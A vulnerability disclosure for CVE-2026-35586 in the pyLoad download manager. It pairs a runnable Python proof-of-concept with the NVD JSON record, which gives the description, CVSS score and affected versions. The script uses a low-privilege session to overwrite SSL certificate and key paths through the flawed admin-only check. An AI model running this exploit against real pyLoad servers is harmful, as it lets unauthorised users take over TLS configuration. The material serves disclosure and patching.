CVE-2026-35586

import requests # Exploit Title: pyLoad < 0.5.0b3.dev97 - SSL Configuration Privilege Escalation # Description: Bypass admin-only checks to overwrite SSL certificate paths. target_url = "http://127.0.0.1:8000/api/set_config_value" # Attacker's cookie (User with 'SETTINGS' permission, NOT 'ADMIN') attacker_cookie = { "pyload_session": "valid_low_privilege_session_token" } # The vulnerable payload. # The code checks for 'ssl_cert' in ADMIN_ONLY_CORE_OPTIONS, # but the actual config key is 'ssl_certfile', causing the check to fail. malicious_payload = { "ssl_certfile": "/path/to/malicious/cert.pem", "ssl_keyfile": "/path/to/malicious/key.pem", "ssl_certchain": "/path/to/malicious/chain.pem" } try: response = requests.post(target_url, json=malicious_payload, cookies=attacker_cookie) if response.status_code == 200: print("[+] Success: SSL configuration overwritten via privilege bypass.") print(f"[+] Response: {response.text}") else: print(f"[-] Failed: HTTP {response.status_code}") except Exception as e: print(f"[-] Error: {e}")

{"cve": {"id": "CVE-2026-35586", "sourceIdentifier": "[email protected]", "published": "2026-04-07T17:16:34.140", "lastModified": "2026-04-16T18:54:32.687", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev97, the ADMIN_ONLY_CORE_OPTIONS authorization set in set_config_value() uses incorrect option names ssl_cert and ssl_key, while the actual configuration option names are ssl_certfile and ssl_keyfile. This name mismatch causes the admin-only check to always evaluate to False, allowing any user with SETTINGS permission to overwrite the SSL certificate and key file paths. Additionally, the ssl_certchain option was never added to the admin-only set at all. This vulnerability is fixed in 0.5.0b3.dev97."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pyload-ng_project:pyload-ng:*:*:*:*:*:python:*:*", "versionEndIncluding": "0.5.0b3.dev96", "matchCriteriaId": "0F5DE8DC-98B9-4A24-89F9-C2FEFD254815"}]}]}], "references": [{"url": "https://github.com/pyload/pyload/security/advisories/GHSA-ppvx-rwh9-7rj7", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}